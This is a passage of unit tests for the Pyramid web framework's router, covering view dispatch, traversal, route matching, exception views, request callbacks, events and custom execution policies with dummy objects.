self.registry.registerUtility(extensions, IRequestExtensions)
environ = self._makeEnviron()
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
self._registerView(self.config.derive_view(view), '',
IViewClassifier, None, None)
router = self._makeOne()
router.request_factory = request_factory
start_response = DummyStartResponse()
router(environ, start_response)
self.assertEqual(view.request.foo, 'bar')
def test_call_view_registered_nonspecific_default_path(self):
from pyramid.interfaces import IViewClassifier
context = DummyContext()
self._registerTraverserFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(self.config.derive_view(view), '',
IViewClassifier, None, None)
self._registerRootFactory(context)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, '')
self.assertEqual(request.subpath, [])
self.assertEqual(request.context, context)
self.assertEqual(request.root, context)
def test_call_view_registered_nonspecific_nondefault_path_and_subpath(self):
from pyramid.interfaces import IViewClassifier
context = DummyContext()
self._registerTraverserFactory(context, view_name='foo',
subpath=['bar'],
traversed=['context'])
self._registerRootFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(view, 'foo', IViewClassifier, None, None)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, 'foo')
self.assertEqual(request.subpath, ['bar'])
self.assertEqual(request.context, context)
self.assertEqual(request.root, context)
def test_call_view_registered_specific_success(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context)
self._registerRootFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, '')
self.assertEqual(request.subpath, [])
self.assertEqual(request.context, context)
self.assertEqual(request.root, context)
def test_call_view_registered_specific_fail(self):
from zope.interface import Interface
from zope.interface import directlyProvides
from pyramid.httpexceptions import HTTPNotFound
from pyramid.interfaces import IViewClassifier
class IContext(Interface):
pass
class INotContext(Interface):
pass
from pyramid.interfaces import IRequest
context = DummyContext()
directlyProvides(context, INotContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse()
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(HTTPNotFound, router, environ, start_response)
def test_call_view_raises_forbidden(self):
from zope.interface import Interface
from zope.interface import directlyProvides
from pyramid.httpexceptions import HTTPForbidden
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse()
view = DummyView(response,
raise_exception=HTTPForbidden("unauthorized"))
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPForbidden, router, environ, start_response)
self.assertEqual(why.args[0], 'unauthorized')
def test_call_view_raises_notfound(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
from pyramid.httpexceptions import HTTPNotFound
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse()
view = DummyView(response, raise_exception=HTTPNotFound("notfound"))
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertEqual(why.args[0], 'notfound')
def test_call_view_raises_response_cleared(self):
from zope.interface import Interface
from zope.interface import directlyProvides
from pyramid.interfaces import IExceptionViewClassifier
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
def view(context, request):
request.response.a = 1
raise KeyError
def exc_view(context, request):
self.assertFalse(hasattr(request.response, 'a'))
request.response.body = b'OK'
return request.response
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
self._registerView(exc_view, '', IExceptionViewClassifier,
IRequest, KeyError)
router = self._makeOne()
start_response = DummyStartResponse()
itera = router(environ, start_response)
self.assertEqual(itera, [b'OK'])
def test_call_request_has_response_callbacks(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse('200 OK')
def view(context, request):
def callback(request, response):
response.called_back = True
request.add_response_callback(callback)
return response
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
router(environ, start_response)
self.assertEqual(response.called_back, True)
def test_call_request_has_finished_callbacks_when_view_succeeds(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse('200 OK')
def view(context, request):
def callback(request):
request.environ['called_back'] = True
request.add_finished_callback(callback)
return response
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
router(environ, start_response)
self.assertEqual(environ['called_back'], True)
def test_call_request_has_finished_callbacks_when_view_raises(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
def view(context, request):
def callback(request):
request.environ['called_back'] = True
request.add_finished_callback(callback)
raise NotImplementedError
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
exc_raised(NotImplementedError, router, environ, start_response)
self.assertEqual(environ['called_back'], True)
def test_call_request_factory_raises(self):
# making sure finally doesnt barf when a request cannot be created
environ = self._makeEnviron()
router = self._makeOne()
def dummy_request_factory(environ):
raise NotImplementedError
router.request_factory = dummy_request_factory
start_response = DummyStartResponse()
exc_raised(NotImplementedError, router, environ, start_response)
def test_call_eventsends(self):
from pyramid.interfaces import INewRequest
from pyramid.interfaces import INewResponse
from pyramid.interfaces import IBeforeTraversal
from pyramid.interfaces import IContextFound
from pyramid.interfaces import IViewClassifier
context = DummyContext()
self._registerTraverserFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, None, None)
request_events = self._registerEventListener(INewRequest)
beforetraversal_events = self._registerEventListener(IBeforeTraversal)
context_found_events = self._registerEventListener(IContextFound)
response_events = self._registerEventListener(INewResponse)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(len(request_events), 1)
self.assertEqual(request_events[0].request.environ, environ)
self.assertEqual(len(beforetraversal_events), 1)
self.assertEqual(beforetraversal_events[0].request.environ, environ)
self.assertEqual(len(context_found_events), 1)
self.assertEqual(context_found_events[0].request.environ, environ)
self.assertEqual(context_found_events[0].request.context, context)
self.assertEqual(len(response_events), 1)
self.assertEqual(response_events[0].response, response)
self.assertEqual(response_events[0].request.context, context)
self.assertEqual(result, response.app_iter)
def test_call_newrequest_evllist_exc_can_be_caught_by_exceptionview(self):
from pyramid.interfaces import INewRequest
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron()
def listener(event):
raise KeyError
self.registry.registerHandler(listener, (INewRequest,))
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, KeyError)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, exception_response.app_iter)
def test_call_route_matches_and_has_factory(self):
from pyramid.interfaces import IViewClassifier
logger = self._registerLogger()
self._registerSettings(debug_routematch=True)
self._registerRouteRequest('foo')
root = object()
def factory(request):
return root
route = self._connectRoute('foo', 'archives/:action/:article', factory)
route.predicates = [DummyPredicate()]
context = DummyContext()
self._registerTraverserFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
self._registerView(view, '', IViewClassifier, None, None)
self._registerRootFactory(context)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, '')
self.assertEqual(request.subpath, [])
self.assertEqual(request.context, context)
self.assertEqual(request.root, root)
matchdict = {'action':'action1', 'article':'article1'}
self.assertEqual(request.matchdict, matchdict)
self.assertEqual(request.matched_route.name, 'foo')
self.assertEqual(len(logger.messages), 1)
self.assertTrue(
logger.messages[0].startswith(
"route matched for url http://localhost:8080"
"/archives/action1/article1; "
"route_name: 'foo', "
"path_info: ")
)
self.assertTrue(
"predicates: 'predicate'" in logger.messages[0]
)
def test_call_route_match_miss_debug_routematch(self):
from pyramid.httpexceptions import HTTPNotFound
logger = self._registerLogger()
self._registerSettings(debug_routematch=True)
self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article')
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron(PATH_INFO='/wontmatch')
self._registerRootFactory(context)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(HTTPNotFound, router, environ, start_response)
self.assertEqual(len(logger.messages), 1)
self.assertEqual(
logger.messages[0],
'no route matched for url http://localhost:8080/wontmatch')
def test_call_route_matches_doesnt_overwrite_subscriber_iface(self):
from pyramid.interfaces import INewRequest
from pyramid.interfaces import IViewClassifier
from zope.interface import alsoProvides
from zope.interface import Interface
self._registerRouteRequest('foo')
class IFoo(Interface):
pass
def listener(event):
alsoProvides(event.request, IFoo)
self.registry.registerHandler(listener, (INewRequest,))
root = object()
def factory(request):
return root
self._connectRoute('foo', 'archives/:action/:article', factory)
context = DummyContext()
self._registerTraverserFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
self._registerView(view, '', IViewClassifier, None, None)
self._registerRootFactory(context)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, '')
self.assertEqual(request.subpath, [])
self.assertEqual(request.context, context)
self.assertEqual(request.root, root)
matchdict = {'action':'action1', 'article':'article1'}
self.assertEqual(request.matchdict, matchdict)
self.assertEqual(request.matched_route.name, 'foo')
self.assertTrue(IFoo.providedBy(request))
def test_root_factory_raises_notfound(self):
from pyramid.interfaces import IRootFactory
from pyramid.httpexceptions import HTTPNotFound
from zope.interface import Interface
from zope.interface import directlyProvides
def rootfactory(request):
raise HTTPNotFound('from root factory')
self.registry.registerUtility(rootfactory, IRootFactory)
class IContext(Interface):
pass
context = DummyContext()
directlyProvides(context, IContext)
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('from root factory' in why.args[0])
def test_root_factory_raises_forbidden(self):
from pyramid.interfaces import IRootFactory
from pyramid.httpexceptions import HTTPForbidden
from zope.interface import Interface
from zope.interface import directlyProvides
def rootfactory(request):
raise HTTPForbidden('from root factory')
self.registry.registerUtility(rootfactory, IRootFactory)
class IContext(Interface):
pass
context = DummyContext()
directlyProvides(context, IContext)
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPForbidden, router, environ, start_response)
self.assertTrue('from root factory' in why.args[0])
def test_root_factory_exception_propagating(self):
from pyramid.interfaces import IRootFactory
from zope.interface import Interface
from zope.interface import directlyProvides
def rootfactory(request):
raise RuntimeError()
self.registry.registerUtility(rootfactory, IRootFactory)
class IContext(Interface):
pass
context = DummyContext()
directlyProvides(context, IContext)
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_traverser_exception_propagating(self):
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=RuntimeError())
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_call_view_exception_propagating(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequestFactory
from pyramid.interfaces import IExceptionViewClassifier
def rfactory(environ):
return request
self.registry.registerUtility(rfactory, IRequestFactory)
from pyramid.request import Request
request = Request.blank('/')
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse()
response.app_iter = ['OK']
error = RuntimeError()
view = DummyView(response, raise_exception=error)
environ = self._makeEnviron()
def exception_view(context, request):
self.assertEqual(request.exc_info[0], RuntimeError)
return response
self._registerView(view, '', IViewClassifier, IRequest, IContext)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['OK'])
# exc_info and exception should still be around on the request after
# the excview tween has run (see
# https://github.com/Pylons/pyramid/issues/1223)
self.assertEqual(request.exception, error)
self.assertEqual(request.exc_info[:2], (RuntimeError, error,))
def test_call_view_raises_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=RuntimeError)
def exception_view(context, request):
self.assertEqual(request.exception.__class__, RuntimeError)
return exception_response
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_view_raises_super_exception_sub_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class SuperException(Exception):
pass
class SubException(SuperException):
pass
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=SuperException)
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, SubException)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(SuperException, router, environ, start_response)
def test_call_view_raises_sub_exception_super_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class SuperException(Exception):
pass
class SubException(SuperException):
pass
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=SubException)
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, SuperException)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_view_raises_exception_another_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class MyException(Exception):
pass
class AnotherException(Exception):
pass
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=MyException)
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, AnotherException)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(MyException, router, environ, start_response)
def test_root_factory_raises_exception_view(self):
from pyramid.interfaces import IRootFactory
from pyramid.interfaces import IRequest
from pyramid.interfaces import IExceptionViewClassifier
def rootfactory(request):
raise RuntimeError()
self.registry.registerUtility(rootfactory, IRootFactory)
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
exception_view = DummyView(exception_response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
app_iter = router(environ, start_response)
self.assertEqual(app_iter, ["Hello, world"])
def test_traverser_raises_exception_view(self):
from pyramid.interfaces import IRequest
from pyramid.interfaces import IExceptionViewClassifier
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=RuntimeError())
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
exception_view = DummyView(exception_response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_exception_view_returns_non_iresponse(self):
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
environ = self._makeEnviron()
response = DummyResponse()
view = DummyView(response, raise_exception=RuntimeError)
self._registerView(self.config.derive_view(view), '',
IViewClassifier, IRequest, None)
exception_view = DummyView(None)
self._registerView(self.config.derive_view(exception_view), '',
IExceptionViewClassifier,
IRequest, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(ValueError, router, environ, start_response)
def test_call_route_raises_route_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
req_iface, RuntimeError)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_view_raises_exception_route_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, IRequest, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
req_iface, RuntimeError)
environ = self._makeEnviron()
start_response = DummyStartResponse()
router = self._makeOne()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_call_route_raises_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_route_raises_super_exception_sub_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class SuperException(Exception):
pass
class SubException(SuperException):
pass
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=SuperException)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, SubException)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
self.assertRaises(SuperException, router, environ, start_response)
def test_call_route_raises_sub_exception_super_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class SuperException(Exception):
pass
class SubException(SuperException):
pass
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=SubException)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, SuperException)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_call_route_raises_exception_another_exception_view(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class MyException(Exception):
pass
class AnotherException(Exception):
pass
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=MyException)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, AnotherException)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
self.assertRaises(MyException, router, environ, start_response)
def test_call_route_raises_exception_view_specializing(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, RuntimeError)
response_spec = DummyResponse()
response_spec.app_iter = ["Hello, special world"]
exception_view_spec = DummyView(response_spec)
self._registerView(exception_view_spec, '', IExceptionViewClassifier,
req_iface, RuntimeError)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, special world"])
def test_call_route_raises_exception_view_another_route(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
req_iface = self._registerRouteRequest('foo')
another_req_iface = self._registerRouteRequest('bar')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=RuntimeError)
self._registerView(view, '', IViewClassifier, req_iface, None)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view = DummyView(response)
self._registerView(exception_view, '', IExceptionViewClassifier,
another_req_iface, RuntimeError)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_call_view_raises_exception_view_route(self):
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
req_iface = self._registerRouteRequest('foo')
response = DummyResponse()
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
view = DummyView(response, raise_exception=RuntimeError)
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, None)
self._registerView(exception_view, '', IExceptionViewClassifier,
req_iface, RuntimeError)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(RuntimeError, router, environ, start_response)
def test_call_view_raises_predicate_mismatch(self):
from pyramid.exceptions import PredicateMismatch
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequest
view = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view, '', IViewClassifier, IRequest, None)
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(PredicateMismatch, router, environ, start_response)
def test_call_view_predicate_mismatch_doesnt_hide_views(self):
from pyramid.exceptions import PredicateMismatch
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequest, IResponse
from pyramid.response import Response
class BaseContext:
pass
class DummyContext(BaseContext):
pass
context = DummyContext()
self._registerTraverserFactory(context)
view = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view, '', IViewClassifier, IRequest,
DummyContext)
good_view = DummyView('abc')
self._registerView(self.config.derive_view(good_view),
'', IViewClassifier, IRequest, BaseContext)
router = self._makeOne()
def make_response(s):
return Response(s)
router.registry.registerAdapter(make_response, (str,), IResponse)
environ = self._makeEnviron()
start_response = DummyStartResponse()
app_iter = router(environ, start_response)
self.assertEqual(app_iter, [b'abc'])
def test_call_view_multiple_predicate_mismatches_dont_hide_views(self):
from pyramid.exceptions import PredicateMismatch
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequest, IResponse
from pyramid.response import Response
from zope.interface import Interface, implementer
class IBaseContext(Interface):
pass
class IContext(IBaseContext):
pass
@implementer(IContext)
class DummyContext:
pass
context = DummyContext()
self._registerTraverserFactory(context)
view1 = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view1, '', IViewClassifier, IRequest,
DummyContext)
view2 = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view2, '', IViewClassifier, IRequest,
IContext)
good_view = DummyView('abc')
self._registerView(self.config.derive_view(good_view),
'', IViewClassifier, IRequest, IBaseContext)
router = self._makeOne()
def make_response(s):
return Response(s)
router.registry.registerAdapter(make_response, (str,), IResponse)
environ = self._makeEnviron()
start_response = DummyStartResponse()
app_iter = router(environ, start_response)
self.assertEqual(app_iter, [b'abc'])
def test_call_view_predicate_mismatch_doesnt_find_unrelated_views(self):
from pyramid.exceptions import PredicateMismatch
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequest
from zope.interface import Interface, implementer
class IContext(Interface):
pass
class IOtherContext(Interface):
pass
@implementer(IContext)
class DummyContext:
pass
context = DummyContext()
self._registerTraverserFactory(context)
view = DummyView(DummyResponse(), raise_exception=PredicateMismatch)
self._registerView(view, '', IViewClassifier, IRequest,
DummyContext)
please_dont_call_me_view = DummyView('abc')
self._registerView(self.config.derive_view(please_dont_call_me_view),
'', IViewClassifier, IRequest, IOtherContext)
router = self._makeOne()
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(PredicateMismatch, router, environ, start_response)
def test_custom_execution_policy(self):
from pyramid.interfaces import IExecutionPolicy
from pyramid.request import Request
from pyramid.response import Response
registry = self.config.registry
def dummy_policy(environ, router):
return Response(status=200, body=b'foo')
registry.registerUtility(dummy_policy, IExecutionPolicy)
router = self._makeOne()
resp = Request.blank('/').get_response(router)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.body, b'foo')
def test_execution_policy_handles_exception(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
class Exception1(Exception):
pass
class Exception2(Exception):
pass
req_iface = self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article', None)
view = DummyView(DummyResponse(), raise_exception=Exception1)
self._registerView(view, '', IViewClassifier, req_iface, None)
exception_view1 = DummyView(DummyResponse(),
raise_exception=Exception2)
self._registerView(exception_view1, '', IExceptionViewClassifier,
IRequest, Exception1)
response = DummyResponse()
response.app_iter = ["Hello, world"]
exception_view2 = DummyView(response)
self._registerView(exception_view2, '', IExceptionViewClassifier,
IRequest, Exception2)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
start_response = DummyStartResponse()
router = self._makeOne()
result = router(environ, start_response)
self.assertEqual(result, ["Hello, world"])
def test_request_context_with_statement(self):
from pyramid.threadlocal import get_current_request
from pyramid.interfaces import IExecutionPolicy
from pyramid.request import Request
from pyramid.response import Response
registry = self.config.registry
result = []
def dummy_policy(environ, router):
with router.request_context(environ):
result.append(get_current_request())
result.append(get_current_request())
return Response(status=200, body=b'foo')
registry.registerUtility(dummy_policy, IExecutionPolicy)
router = self._makeOne()
resp = Request.blank('/test_path').get_response(router)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.body, b'foo')
self.assertEqual(result[0].path_info, '/test_path')
self.assertEqual(result[1], None)
def test_request_context_manually(self):
from pyramid.threadlocal import get_current_request
